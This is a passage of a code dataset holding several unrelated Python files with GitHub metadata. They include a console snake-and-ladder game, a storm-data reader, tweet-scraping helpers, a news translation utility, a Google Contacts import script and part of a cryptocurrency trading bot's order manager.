7))\n","repo_name":"CyrilWaechter/pyRevitMEP","sub_path":"pyRevitMEP.tab/Lab.panel/Lab.pulldown/3DControlView.pushbutton/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":3453,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"21"} +{"seq_id":"71184274934","text":"import time\r\nimport random\r\nfrom os import system\r\nimport os\r\nimport copy\r\n\r\nclass snakeLadder():\r\n\r\n# ------------------------------------INITIALIZE BOARD AND PLAYERS----------------------------------------------\r\n def __init__(self):\r\n self.player_names=[]\r\n self.No_of_player=0\r\n self.player_pos={}\r\n\r\n title=\"SNAKE AND LADDER\"\r\n\r\n print(\"\\n\")\r\n for i in range(70):\r\n print(\" \"*i,end=\"\")\r\n print(\"/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/*~\",end=\"\")\r\n time.sleep(0.01)\r\n print(\"\\r\",end=\"\")\r\n\r\n print(\"\\n\\n\\n\")\r\n print(\"\\t\\t\\t\\t\\t\\t\\t\\t\\t\",end=\"\")\r\n for i in title:\r\n print(i,end=\"\",flush=True)\r\n time.sleep(0.05)\r\n\r\n input(\"\\n\\n\\t\\t\\t\\t\\t\\t\\t\\t READY TO PLAY PRESS ENTER!!!\")\r\n\r\n while self.No_of_player<2 or self.No_of_player>5:\r\n self.No_of_player=int(input(\"Enter Number of Players (max:5): \"))\r\n if(self.No_of_player>5 or self.No_of_player<2):\r\n print(\"---------------Please Enter value Between 2 to 5 ------------------\")\r\n\r\n for i in range(self.No_of_player):\r\n p_name=input(f\"Enter Player {i+1} Name: \")\r\n while p_name in self.player_names:\r\n print(\"Player Names Must Different!!!!\")\r\n p_name=input(f\"Enter Player {i+1} Name: \")\r\n self.player_names.append(p_name)\r\n\r\n for i in self.player_names:\r\n self.player_pos[i[0]+i[-1]]=0\r\n\r\n\r\n\r\n# -----------------------------Default Board---------------------------------------------\r\n def default_board(self):\r\n self.No_of_snakes=12\r\n self.No_of_ladder=8\r\n self.snake_position=[15,22,36,48,52,57,64,68,84,90,94,98]\r\n self.ladder_position=[8,19,23,35,40,52,73,77]\r\n\r\n\r\n\r\n# -----------------------------CUSTOMIZE BOARD--------------------------------------------\r\n def custom_board(self):\r\n self.No_of_snakes=0\r\n self.No_of_ladder=0\r\n self.ladder_position=[]\r\n self.snake_position=[]\r\n\r\n #---------------------------------Custom Snakes----------------------------------------\r\n\r\n while self.No_of_snakes<1 or self.No_of_snakes>20:\r\n self.No_of_snakes=int(input(\"Enter Number of Snakes 
you want: \"))\r\n if self.No_of_snakes<1 or self.No_of_snakes>20:\r\n print(\"---------------Please Enter value Between 1 to 20 ------------------\")\r\n \r\n for i in range(self.No_of_snakes):\r\n pos=int(input(f\"Enter Snake {i+1} Position: \"))\r\n while pos>99 or pos<10 or (pos in self.snake_position):\r\n print(\"---------------Please Enter value Between 10 to 99 and different One!!------------------\")\r\n pos=int(input(f\"Enter Snake {i+1} Position: \"))\r\n self.snake_position.append(pos)\r\n\r\n\r\n # -------------------------------Custom Ladders--------------------------------------\r\n\r\n while self.No_of_ladder<1 or self.No_of_ladder>20:\r\n self.No_of_ladder=int(input(\"Enter Number of Ladders You Want: \"))\r\n if self.No_of_ladder<1 or self.No_of_ladder>20:\r\n print(\"---------------Please Enter value Between 1 to 20 ------------------\")\r\n\r\n for i in range(self.No_of_ladder):\r\n pos_l=int(input(f\"Enter Ladder {i+1} Position: \"))\r\n while pos_l>80 or pos_l<5 or (pos_l in self.ladder_position):\r\n print(\"---------------Please Enter value Between 5 to 80 and different One!!------------------\")\r\n pos_l=int(input(f\"Enter Ladder {i+1} Position: \"))\r\n \r\n while pos_l in self.snake_position:\r\n print(\"Snake and Ladder Cannot Be On same Position!!!!!\")\r\n pos_l=int(input(f\"Enter Ladder {i+1} Position: \"))\r\n\r\n self.ladder_position.append(pos_l)\r\n\r\n\r\n\r\n\r\n# --------------------------------------Create Board--------------------------------------------\r\n\r\n\r\n def create_board(self):\r\n system(\"cls\")\r\n for i in range(10,0,-1):\r\n loc=0\r\n raw_line=[]\r\n for j in range(0,10):\r\n if(i%2==0):\r\n loc=(i*10)-j\r\n if loc in self.snake_position:\r\n print(f\"-{(i*10)-j}-$-{int(loc/2)}--\".center(13),end=\"\")\r\n elif loc in self.ladder_position:\r\n print(f\"-{(i*10)-j}-#-{loc+10}--\".center(13),end=\"\")\r\n else:\r\n print(f\"----{(i*10)-j}----\".center(13),end=\"\")\r\n raw_line.append(loc)\r\n \r\n else:\r\n loc=((i-1)*10)+j+1\r\n if loc in self.snake_position:\r\n print(f\"-{((i-1)*10)+j+1}-$-{int(loc/2)}--\".center(13),end=\"\")\r\n elif loc in self.ladder_position:\r\n print(f\"-{((i-1)*10)+j+1}-#-{loc+10}--\".center(13),end=\"\")\r\n else:\r\n print(f\"----{((i-1)*10)+j+1}----\".center(13),end=\"\")\r\n\r\n raw_line.append(loc)\r\n print(end=\"\\n\")\r\n\r\n for i in range(len(raw_line)):\r\n pla_combine=\"\"\r\n for k,v in self.player_pos.items():\r\n if raw_line[i]==v:\r\n pla_combine=pla_combine+\"^\"+k\r\n\r\n if pla_combine==\"\":\r\n print(\" \".center(13),end=\"\")\r\n else:\r\n print(f\"**[{pla_combine}]**\".center(13),end=\"\")\r\n \r\n print(\"\\n\")\r\n\r\n\r\n\r\n# -------------------------------------------ROLL DICE------------------------------------------------\r\n\r\n def roll_dice(self):\r\n input(\"!!!!! 
Press Enter To Roll Dice !!!!!\")\r\n \r\n dice_val=random.randint(1,6)\r\n if(dice_val==1):\r\n print((\" ________\\n| |\\n| * |\\n|________|\"))\r\n elif(dice_val==2):\r\n print((\" ________\\n| |\\n| * * |\\n|________|\"))\r\n elif(dice_val==3):\r\n print((\" ________\\n| |\\n| * * * |\\n|________|\"))\r\n elif(dice_val==4):\r\n print((\" ________\\n| * * |\\n| |\\n|__*__*__|\"))\r\n elif(dice_val==5):\r\n print((\" ________\\n| * * |\\n| * |\\n|__*__*__|\"))\r\n elif(dice_val==6):\r\n print((\" ________\\n| * * |\\n| * * |\\n|__*__*__|\"))\r\n return dice_val\r\n\r\n\r\n\r\n# -----------------------------------------------BOARD Refresh-------------------------------------------\r\n def refresh_board(self):\r\n input(\"\\nPress Enter To Move Pieces!!!\")\r\n self.create_board()\r\n \r\n\r\n\r\n# -----------------------------------------------Main Play Function--------------------------------------\r\n def play(self):\r\n ack=0\r\n turn_open_dict=copy.deepcopy(self.player_pos)\r\n while ack==0:\r\n for i in self.player_names:\r\n print(f\"{i}'s turn:\")\r\n num=self.roll_dice()\r\n if self.player_pos[i[0]+i[-1]]==0:\r\n if num==6:\r\n print(\"Wow Piece Opened!!!\")\r\n turn_open_dict[i[0]+i[-1]]=1\r\n else:\r\n print(\"\\nBring 6 to Open Piece!!!\")\r\n\r\n self.refresh_board()\r\n\r\n\r\n if turn_open_dict[i[0]+i[-1]]==1:\r\n test_pos=self.player_pos[i[0]+i[-1]]+num\r\n\r\n if test_pos>100:\r\n self.refresh_board()\r\n continue\r\n \r\n if test_pos==100:\r\n self.player_pos[i[0]+i[-1]]=test_pos\r\n self.refresh_board()\r\n print(f\"\\n\\n________________________________________________________________________________________________\")\r\n print(f\"_____________________________________Hurrey!!! {i} Wins_____________________________________\")\r\n input()\r\n os._exit(1)\r\n \r\n if test_pos in self.snake_position:\r\n print(\"\\nOhh No! You Got A Snake Bite!!! \")\r\n test_pos=int(test_pos/2)\r\n self.player_pos[i[0]+i[-1]]=test_pos\r\n elif test_pos in self.ladder_position:\r\n print(\"\\nNice! You Found A Ladder!!! \")\r\n test_pos=test_pos+10\r\n self.player_pos[i[0]+i[-1]]=test_pos\r\n else:\r\n self.player_pos[i[0]+i[-1]]=test_pos\r\n self.refresh_board()\r\n\r\n\r\n\r\n# ------------------------------------------Program Starts From Here----------------------------------------------------\r\n\r\n\r\nif __name__==\"__main__\":\r\n obj=snakeLadder()\r\n \r\n while True:\r\n ack=int(input((\"\\n\\nChoose:\\n1) Play Default Board \\n2) Customize Board \\n: \")))\r\n\r\n if(ack==1):\r\n obj.default_board()\r\n break\r\n elif(ack==2):\r\n obj.custom_board()\r\n break\r\n else:\r\n print(\"Please Choose Valid Option!!\")\r\n\r\n\r\n input((\"\\n\\n\\t\\t\\t\\t\\t\\t\\t\\t Let's Begin Press Enter!!!\"))\r\n\r\n obj.create_board()\r\n obj.play()","repo_name":"harshit13660/Learning_Files_Python","sub_path":"snakeLadder.py","file_name":"snakeLadder.py","file_ext":"py","file_size_in_byte":9384,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"23589395793","text":"import math\nimport pandas as pd\nimport numpy as np\n\nfrom settings.dev import DATA_DIR, OUTPUT_DIR\n\n\ndef read_data(dataset: str, horizon: int = 24) -> (pd.DataFrame, np.ndarray):\n \"\"\"\n Reads data from the DATA_DIR and separates into target and features. 
Target\n    is the windspeed of the same storm taken at the given horizon ahead.\n    Args:\n        dataset (str): Name of the dataset in DATA_DIR\n        horizon (int): Horizon for target (in hours)\n\n    Returns:\n        (pd.DataFrame, np.ndarray) : Tuple of features and target\n    \"\"\"\n    try:\n        Data = pd.read_csv(DATA_DIR + dataset)\n    except IOError:\n        raise IOError(\"Data not found\")\n\n    y = np.empty((len(Data)))\n    y[:] = np.nan\n\n    windowt = horizon // 6  # number of 6-hour steps; integer so it can be used as a row offset\n    for i in range(len(Data)):\n        if i + windowt >= len(Data):\n            continue\n        if Data['instant_t'][i + windowt] - Data['instant_t'][i] == windowt:\n            y[i] = Data['windspeed'][i + windowt]\n    X = Data\n    i_toerase = []\n    for i, yi in enumerate(y):\n        if math.isnan(yi):\n            i_toerase.append(i)\n    X = X.drop(X.index[i_toerase])\n    X.index = range(len(X))\n    y = np.delete(y, i_toerase, axis=0)\n    return X, y\n\n\ndef save_model(model, name: str = 'model') -> None:\n    # unused\n    \"\"\"\n    Saves the keras model in .h5 format in OUTPUT_DIR.\n    Args:\n        name (str): Name of the output file\n\n    Returns:\n        None\n    \"\"\"\n    model.save(OUTPUT_DIR + '/{}.h5'.format(name))\n","repo_name":"fxferlande/storm_forecast","sub_path":"model/read_write.py","file_name":"read_write.py","file_ext":"py","file_size_in_byte":1522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"74998154613","text":"from datetime import date\nimport datetime\nfrom twintScripts import saveTweetsByHashtag, saveUserByName\n\n\ndef saveTweetsByHashtagList(hashtagList, startDate=datetime.datetime(2020, 10, 1), endDate=date.today(), username=None):\n    for hashtag in hashtagList:\n        print('\\033[96m' + \"saving tweets for hashtag: \" + hashtag + '\\033[0m')\n        saveTweetsByHashtag(hashtag, startDate, endDate, username)\n\n\ndef saveUsers(usersList):\n    for userName in usersList:\n        try:\n            saveUserByName(userName)\n        except Exception as e:\n            print(e)\n\n\ndef saveTweetsByHashtagListForAllUsers(hashtagList, userList, startDate=datetime.datetime(2020, 10, 1), endDate=date.today()):\n    for hashtag in hashtagList:\n        for user in userList:\n            print('\\033[96m' + \"saving tweets for hashtag: \" + hashtag + \" for user: \" + user + '\\033[0m')\n            saveTweetsByHashtag(hashtag, startDate, endDate, user)\n","repo_name":"alexmaar/political-analysis-backend","sub_path":"db/handle_tweets_module/scripts.py","file_name":"scripts.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"315671897","text":"\"\"\"Perform translation.\"\"\"\n\nimport logging\n\nfrom api.version1_0.database import DbHelper\nfrom conf import settings\nfrom services.translate import translate\n\nlog = logging.getLogger()\n\n_TRANSLATED_TEXT = 'translatedText'\n_LANGUAGE = 'language'\n\n\ndef update_db_query(translation, detected_language, news_id):\n    \"\"\"\n\n    :param translation:\n    :param detected_language:\n    :param news_id:\n    :return:\n    \"\"\"\n    if translation and detected_language and news_id:\n        return u\"UPDATE news SET translated_content='%s', detected_language='%s' \" \\\n               u\"WHERE news_id=%s;\" % (\n            translation, detected_language, str(news_id))\n    return\n\n\ndef translate_content(text, language=settings.TRANSLATION_DEFAULT_LANGUAGE):\n    \"\"\"\n\n    :param text:\n    :param language:\n    :return:\n    \"\"\"\n    if not text:\n        raise ValueError('Invalid text')\n    if not settings.TRANSLATION_SERVICE:\n        log.info(\n            'Translation service is disabled in 
settings.translation_service')\n return settings.EMPTY_TEXT\n # Limited text (Limit requests to settings.TRANSLATION_LIMIT)\n limited_text = text[:settings.TRANSLATION_LIMIT]\n\n detected_language = translate.detect_language(limited_text)\n # Submit translation request.\n if detected_language.get('language') != language:\n logging.info(\n 'Translating from {} to {}'.format(\n detected_language.get('language'), language))\n translated_text = translate.translate_text(language, limited_text)\n if translated_text.get('translatedText'):\n return translated_text.get('translatedText')\n else:\n log.warning(\n 'No text to translate. Source language (%s) eq target language ('\n '%s)' % (detected_language.get('language'), language))\n return text\n\n\ndef translate_article(campaign_instance, article, new_article, news_id):\n \"\"\"\n\n :param campaign_instance:\n :param article:\n :param new_article:\n :param report:\n :param news_id:\n :return:\n \"\"\"\n # Perform translation using Google Translate API\n log.info('Translating...%r', article.url)\n translated_text = translate_content(\n article.title, campaign_instance.translation_lang)\n if new_article and translated_text:\n # Update database record\n sql_query = update_db_query(\n translated_text.replace(\"'\", \"''\"), settings.DEFAULT_LANGUAGE, news_id)\n DbHelper.update_database(sql_query)\n else:\n log.warning('Article already exists, skipping DB update')\n return translated_text\n","repo_name":"gogasca/news_ml","sub_path":"services/translate/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2604,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"24922979430","text":"import os\nfrom google.oauth2.credentials import Credentials\nfrom googleapiclient.discovery import build\nfrom googleapiclient.errors import HttpError\nfrom google.oauth2 import service_account\nfrom schedule_tracker import updateScheduleTracker\nimport requests\n\ncreds = service_account.Credentials.from_service_account_info(\n\t\t{\n\t\t\t\"private_key\": os.environ.get('PRIVATE_KEY'),\n\t\t\t\"client_email\": os.environ.get('CLIENT_EMAIL'),\n\t\t\t\"token_uri\": \"https://oauth2.googleapis.com/token\",\n\t\t}, scopes=['https://www.googleapis.com/auth/contacts.readonly'], subject=os.environ.get('USER_EMAIL'))\n\nLUCOS_CONTACTS = os.environ.get('LUCOS_CONTACTS')\nif not LUCOS_CONTACTS:\n\texit(\"LUCOS_CONTACTS environment variable not set - needs to be the URL of a running lucos_contacts instance.\")\n\nLUCOS_HEADERS={'AUTHORIZATION':\"key \"+os.environ.get('LUCOS_CONTACTS_API_KEY')}\n\ntry:\n\tservice = build('people', 'v1', credentials=creds)\n\n\tsyncGroup = service.contactGroups().get(\n\t\tresourceName=os.environ.get('GROUP'),\n\t\tmaxMembers=1000,\n\t).execute()\n\tremainingResourceNames = syncGroup['memberResourceNames']\n\twhile len(remainingResourceNames) > 0:\n\t\tcontactsToUpdate = {}\n\n\t\t## Google's People API only supports 200 people at once, so split the group into chunks of 200\n\t\tnext200 = remainingResourceNames[:200]\n\t\tremainingResourceNames = remainingResourceNames[200:]\n\t\tpeople = service.people().getBatchGet(\n\t\t\tresourceNames=next200,\n\t\t\tpersonFields=\"names,emailAddresses,birthdays,phoneNumbers,photos,externalIds,metadata\"\n\t\t).execute()\n\t\tfor (resourceName, data) in zip(next200, people['responses']):\n\t\t\tperson = data['person']\n\n\t\t\tbirthday = {\n\t\t\t\t'day': None,\n\t\t\t\t'month': None,\n\t\t\t\t'year': None,\n\t\t\t}\n\t\t\tfor 
birthday_instance in person.get('birthdays',[]):\n\t\t\t\tif 'day' in birthday_instance['date']:\n\t\t\t\t\tbirthday['day'] = birthday_instance['date']['day']\n\t\t\t\tif 'month' in birthday_instance['date']:\n\t\t\t\t\tbirthday['month'] = birthday_instance['date']['month']\n\t\t\t\tif 'year' in birthday_instance['date']:\n\t\t\t\t\tbirthday['year'] = birthday_instance['date']['year']\n\n\t\t\tphotos = {'CONTACT': None, 'PROFILE': None}\n\t\t\tfor photo in person.get('photos',[]):\n\t\t\t\tif 'default' not in photo:\n\t\t\t\t\tphotos[photo['metadata']['source']['type']] = photo['url']\n\t\t\t# Prefer photo I've set, but default to their profile pic otherwise\n\t\t\tphotoUrl = photos['CONTACT'] or photos['PROFILE']\n\n\n\n\t\t\t## Add items to the accounts list in the order of precedence to find matches\n\t\t\taccounts = []\n\t\t\taccounts.append({\n\t\t\t\t\"type\": \"googlecontact\",\n\n\t\t\t\t# Remove the /people/ prefix because Google inconsistently uses different prefixes in different places\n\t\t\t\t# eg /people/ in its API, but /person/ in its UI\n\t\t\t\t\"contactid\": resourceName.replace(\"people/\",\"\"),\n\t\t\t});\n\t\t\tfor num in person.get('phoneNumbers',[]):\n\t\t\t\taccounts.append({\n\t\t\t\t\t\"type\": \"phone\",\n\t\t\t\t\t\"number\": num['canonicalForm'],\n\t\t\t\t})\n\t\t\tfor email in person.get('emailAddresses',[]):\n\t\t\t\taccounts.append({\n\t\t\t\t\t\"type\": \"email\",\n\t\t\t\t\t\"address\": email['value'],\n\t\t\t\t})\n\t\t\tfor name in person.get('names', []):\n\t\t\t\taccounts.append({\n\t\t\t\t\t\"type\": \"name\",\n\t\t\t\t\t\"name\": name['displayName'],\n\t\t\t\t})\n\n\t\t\tdata = {\"identifiers\":accounts, \"date_of_birth\": birthday}\n\n\t\t\tresp = requests.post(LUCOS_CONTACTS+'agents/import', headers=LUCOS_HEADERS, allow_redirects=False, json=data)\n\t\t\tresp.raise_for_status()\n\tupdateScheduleTracker(success=True)\n\nexcept Exception as err:\n\tprint(err)\n\tupdateScheduleTracker(success=False, message=str(err))\n","repo_name":"lucas42/lucos_contacts_googlesync_import","sub_path":"import.py","file_name":"import.py","file_ext":"py","file_size_in_byte":3440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"8177909835","text":"import time\r\nfrom datetime import datetime\r\n\r\nimport threading\r\n\r\nfrom GDAXControler import GDAXControler\r\nfrom UIGraph import UIGraph\r\nimport TradingBotConfig as theConfig\r\nimport Notifier as theNotifier\r\n\r\nclass TransactionManager(object):\r\n\r\n\r\n    def __init__(self, GDAXControler, UIGraph, MarketData, Settings):\r\n        self.theGDAXControler = GDAXControler\r\n        self.theUIGraph = UIGraph\r\n        self.theMarketData = MarketData\r\n        # Application settings data instance\r\n        self.theSettings = Settings\r\n\r\n        self.FiatAccountBalance = 0\r\n        self.FIATAccountBalanceSimulated = 0\r\n        self.initialFiatAccountBalance = 0 # Only necessary in Trading mode. 
In simulation mode, profit is only theoric\r\n self.initialInvestedFiatAmount = 0\r\n self.CryptoAccountBalance = 0\r\n self.cryptoAccountBalanceSimulated = 0\r\n self.theoricalProfit = 0\r\n self.realProfit = 0\r\n self.percentageProfit = 0\r\n self.currentBuyAmountInCryptoWithoutFee = 0\r\n self.currentBuyAmountInCryptoWithFee = 0\r\n self.currentSoldAmountInCryptoViaLimitOrder = 0\r\n self.averageSellPriceInFiat = 0\r\n self.platformTakerFeeInPercent = float(self.theSettings.SETT_GetSettings()[\"platformTakerFee\"]) * 0.01\r\n self.pendingNotificationToSend = \"\"\r\n\r\n self.buyTimeInTimeStamp = 0\r\n self.currentBuyInitialPriceInEUR = 0\r\n\r\n self.theUIGraph.UIGR_updateAccountsBalance(round(self.FiatAccountBalance, 6), round(self.CryptoAccountBalance, 6))\r\n self.theUIGraph.UIGR_updateTotalProfit(self.realProfit, self.theoricalProfit, self.percentageProfit, False)\r\n self.threadOrderPlacingLock = threading.Lock()\r\n self.isOrderPlacingActive = False\r\n self.orderPlacingType = 'NONE'\r\n self.orderPlacingState = 'NONE'\r\n self.orderPlacingMinMaxPrice = 0\r\n self.orderPlacingCurrentPriceInFiat = 0\r\n self.transactionHistory = []\r\n self.isRunning = True\r\n\r\n\r\n def TRNM_InitiateNewTradingSession(self, startSession):\r\n self.theoricalProfit = 0\r\n self.realProfit = 0\r\n self.percentageProfit = 0\r\n self.currentBuyAmountInCryptoWithoutFee = 0\r\n self.currentBuyAmountInCryptoWithFee = 0\r\n self.currentSoldAmountInCryptoViaLimitOrder = 0\r\n self.averageSellPriceInFiat = 0\r\n self.buyTimeInTimeStamp = 0\r\n self.currentBuyInitialPriceInEUR = 0\r\n self.pendingNotificationToSend = \"\"\r\n self.isOrderPlacingActive = False\r\n self.orderPlacingType = 'NONE'\r\n self.orderPlacingState = 'NONE'\r\n self.orderPlacingMinMaxPrice = 0\r\n self.orderPlacingCurrentPriceInFiat = 0\r\n\r\n # Refresh platform taker fee\r\n self.platformTakerFeeInPercent = float(self.theSettings.SETT_GetSettings()[\"platformTakerFee\"]) * 0.01\r\n print(\"TRNM - Initiating new trading session. 
Applied platformTakerFee multiplier is %s\" % self.platformTakerFeeInPercent)\r\n\r\n        # In simulation mode, simulate an amount of money on the account\r\n        if (theConfig.CONFIG_INPUT_MODE_IS_REAL_MARKET == False):\r\n            self.initialFiatAccountBalance = 0\r\n            self.FIATAccountBalanceSimulated = float(self.theSettings.SETT_GetSettings()[\"simulatedFiatBalance\"])\r\n            self.initialInvestedFiatAmount = float(self.theSettings.SETT_GetSettings()[\"investPercentage\"]) * 0.01 * self.FIATAccountBalanceSimulated\r\n            self.cryptoAccountBalanceSimulated = 0\r\n            self.theUIGraph.UIGR_updateAccountsBalance(self.FIATAccountBalanceSimulated, self.cryptoAccountBalanceSimulated)\r\n            self.theUIGraph.UIGR_updateTotalProfit(self.realProfit, self.theoricalProfit, self.percentageProfit, True)\r\n        else:\r\n            self.initialFiatAccountBalance = self.theGDAXControler.GDAX_GetFiatAccountBalance()\r\n            print(\"TRNM - Initial fiat balance is %s\" % self.initialFiatAccountBalance)\r\n            self.FIATAccountBalanceSimulated = 0\r\n            self.cryptoAccountBalanceSimulated = 0\r\n            self.initialInvestedFiatAmount = float(self.theSettings.SETT_GetSettings()[\"investPercentage\"]) * 0.01 * self.initialFiatAccountBalance\r\n            self.theUIGraph.UIGR_updateTotalProfit(self.realProfit, self.theoricalProfit, self.percentageProfit, False)\r\n            self.theGDAXControler.GDAX_RefreshAccountsDisplayOnly()\r\n            self.theGDAXControler.GDAX_RequestAccountsBalancesUpdate()\r\n\r\n        if (startSession == True):\r\n            self.theUIGraph.UIGR_updateInfoText(\"Waiting for next buy opportunity\", False)\r\n\r\n    def TRNM_TerminateCurrentTradingSession(self):\r\n        print(\"TRNM - Terminating current trading session...\")\r\n\r\n        self.FIATAccountBalanceSimulated = 0\r\n        self.cryptoAccountBalanceSimulated = 0\r\n        self.theUIGraph.UIGR_updateInfoText(\"\", False)\r\n        self.pendingNotificationToSend = \"\"\r\n        self.isOrderPlacingActive = False\r\n        self.orderPlacingCurrentPriceInFiat = 0\r\n        self.orderPlacingState = \"NONE\"\r\n\r\n        if (theConfig.CONFIG_INPUT_MODE_IS_REAL_MARKET == True):\r\n            # In real trading mode, let the GDAX controller update the accounts labels. 
TRNM will manage\r\n            # money / refresh itself when initiating the new trading session\r\n            self.theGDAXControler.GDAX_CancelOngoingLimitOrder()\r\n\r\n    def TRNM_getCryptoBalance(self):\r\n        return self.theGDAXControler.GDAX_GetCryptoAccountBalance()\r\n\r\n    def TRNM_ForceAccountsUpdate(self):\r\n        self.theGDAXControler.GDAX_RequestAccountsBalancesUpdate()\r\n\r\n    def TRNM_getBTCBalance(self):\r\n        return self.theGDAXControler.GDAX_GetBTCAccountBalance()\r\n\r\n    def Place_Market_Order(self, buyOrSell):\r\n        if (buyOrSell == \"BUY\"):\r\n            print(\"TRNM - Market %s order requested\" % (buyOrSell))\r\n            self.theUIGraph.UIGR_updateInfoText(\"Placing %s order\" % (buyOrSell), False)\r\n            self.threadOrderPlacingLock.acquire()\r\n            self.TRNM_BuyNow()\r\n            self.threadOrderPlacingLock.release()\r\n        elif (buyOrSell == \"SELL\"):\r\n            print(\"TRNM - Market %s order requested\" % (buyOrSell))\r\n            self.theUIGraph.UIGR_updateInfoText(\"Placing %s order\" % (buyOrSell), False)\r\n            self.threadOrderPlacingLock.acquire()\r\n            self.TRNM_SellNow(False)\r\n            self.threadOrderPlacingLock.release()\r\n        else:\r\n            print(\"TRNM - Market order requested with unknown order type %s\" % buyOrSell)\r\n\r\n    def computeBuyCapabilityInCrypto(self, includeHeldBalance):\r\n        buyCapabilityInCrypto = 0.0\r\n        accountBalanceHeld = 0.0\r\n\r\n        if (theConfig.CONFIG_INPUT_MODE_IS_REAL_MARKET == True):\r\n            self.FiatAccountBalance = self.theGDAXControler.GDAX_GetFiatAccountBalance()\r\n            if (includeHeldBalance):\r\n                accountBalanceHeld = self.theGDAXControler.GDAX_GetFiatAccountBalanceHeld()\r\n                self.FiatAccountBalance += accountBalanceHeld\r\n            currentPriceInFiat = self.theGDAXControler.GDAX_GetRealTimePriceInEUR()\r\n            buyCapabilityInCrypto = float(self.FiatAccountBalance) / float(currentPriceInFiat)\r\n            print(\"TRNM - computeBuyCapabilityInCrypto: capability is %s (current balance is %s + %s (hold))\" % (buyCapabilityInCrypto, self.FiatAccountBalance, accountBalanceHeld))\r\n        else:\r\n            buyCapabilityInCrypto = self.FIATAccountBalanceSimulated / self.theMarketData.MRKT_GetLastRefPrice()\r\n        return buyCapabilityInCrypto\r\n\r\n    def computeProfitEstimation(self, isSellFeeApplied, soldAmountInCryptoWithFee):\r\n        # Don't include the fee, to get the actual amount of money invested by the user (its cost from the user's point of view), not the amount actually invested on the platform after deducting the fee\r\n        InvestmentInFiat = self.currentBuyInitialPriceInEUR * self.currentBuyAmountInCryptoWithoutFee\r\n        if (isSellFeeApplied):\r\n            SellPriceWithFeeInFiat = (self.averageSellPriceInFiat * soldAmountInCryptoWithFee) * (1-(self.platformTakerFeeInPercent))\r\n        else:\r\n            SellPriceWithFeeInFiat = (self.averageSellPriceInFiat * soldAmountInCryptoWithFee)\r\n\r\n        print(\"TRNM - ComputeProfitEstimation : Buy cost (fee excluded): %s\" % InvestmentInFiat)\r\n        print(\"TRNM - ComputeProfitEstimation : Sell price with fee: %s, fee applied? 
%s\" % (SellPriceWithFeeInFiat, isSellFeeApplied))\r\n profitEstimation = (SellPriceWithFeeInFiat - InvestmentInFiat)\r\n return [profitEstimation, SellPriceWithFeeInFiat]\r\n\r\n\r\n def TRNM_BuyNow(self):\r\n if ((self.theGDAXControler.GDAX_IsConnectedAndOperational() == \"True\") or (theConfig.CONFIG_INPUT_MODE_IS_REAL_MARKET == False)):\r\n if (self.currentBuyAmountInCryptoWithoutFee == 0): # Security : no telesopic buys\r\n bOrderIsSuccessful = False\r\n\r\n # Refresh account balances =======================================================================\r\n self.FiatAccountBalance = self.theGDAXControler.GDAX_GetFiatAccountBalance()\r\n self.CryptoAccountBalance = self.theGDAXControler.GDAX_GetCryptoAccountBalance()\r\n\r\n # Compute capability ============================================================================\r\n BuyCapabilityInCrypto = self.computeBuyCapabilityInCrypto(False)\r\n print(\"TRNM - Buy Now, capability is: %s Crypto (fiat balance is %s, crypto balance is %s)\" % (BuyCapabilityInCrypto, self.FiatAccountBalance, self.CryptoAccountBalance))\r\n\r\n # Compute and fill Buy data ======================================================================\r\n if (theConfig.CONFIG_INPUT_MODE_IS_REAL_MARKET == True):\r\n self.currentBuyInitialPriceInEUR = self.theGDAXControler.GDAX_GetRealTimePriceInEUR()\r\n else:\r\n self.currentBuyInitialPriceInEUR = self.theMarketData.MRKT_GetLastRefPrice()\r\n ratioOfCryptoCapabilityToBuy = float(self.theSettings.SETT_GetSettings()[\"investPercentage\"]) * 0.01\r\n self.currentBuyAmountInCryptoWithoutFee = BuyCapabilityInCrypto * ratioOfCryptoCapabilityToBuy\r\n self.currentBuyAmountInCryptoWithFee = BuyCapabilityInCrypto * ratioOfCryptoCapabilityToBuy * (1-(self.platformTakerFeeInPercent))\r\n\r\n # Perform transaction ===========================================================================\r\n print(\"TRNM - Buy Now, amount is: %s Crypto\" % self.currentBuyAmountInCryptoWithoutFee)\r\n bAmountIsAboveMinimumRequested = self.theGDAXControler.GDAX_IsAmountToBuyAboveMinimum(self.currentBuyAmountInCryptoWithoutFee)\r\n print(\"TRNM - Amount to buy is above minimum possible ? 
%s\" % bAmountIsAboveMinimumRequested)\r\n if (bAmountIsAboveMinimumRequested == True):\r\n if (theConfig.CONFIG_INPUT_MODE_IS_REAL_MARKET == True):\r\n # Real market: Send the Buy order\r\n bOrderIsSuccessful = self.theGDAXControler.GDAX_SendBuyOrder(self.currentBuyAmountInCryptoWithoutFee)\r\n\r\n\r\n # Update display ============================================================================\r\n self.buyTimeInTimeStamp = time.time()\r\n print(\"TRNM - === BUY %s Crypto at %s Fiat\" % (self.currentBuyAmountInCryptoWithoutFee, self.currentBuyInitialPriceInEUR))\r\n buyTimeStr = datetime.fromtimestamp(int(self.buyTimeInTimeStamp)).strftime('%H:%M')\r\n if (bOrderIsSuccessful == True):\r\n self.performBuyDisplayActions(False)\r\n else:\r\n # Buy transaction failed, cancel\r\n self.currentBuyAmountInCryptoWithoutFee = 0\r\n self.currentBuyAmountInCryptoWithFee = 0\r\n self.currentSoldAmountInCryptoViaLimitOrder = 0\r\n self.averageSellPriceInFiat = 0\r\n self.currentBuyInitialPriceInEUR = 0\r\n if (bAmountIsAboveMinimumRequested == False):\r\n self.theUIGraph.UIGR_updateInfoText(\"%s: Buy order error: amount is too low, increase your %s balance\" % (buyTimeStr, self.theSettings.SETT_GetSettings()[\"strFiatType\"]), True)\r\n else:\r\n self.theUIGraph.UIGR_updateInfoText(\"%s: Buy order error\" % buyTimeStr, True)\r\n\r\n return bOrderIsSuccessful\r\n else:\r\n print(\"TRNM - Trying to buy but there's already a pending buy. Aborted.\")\r\n return False\r\n else:\r\n 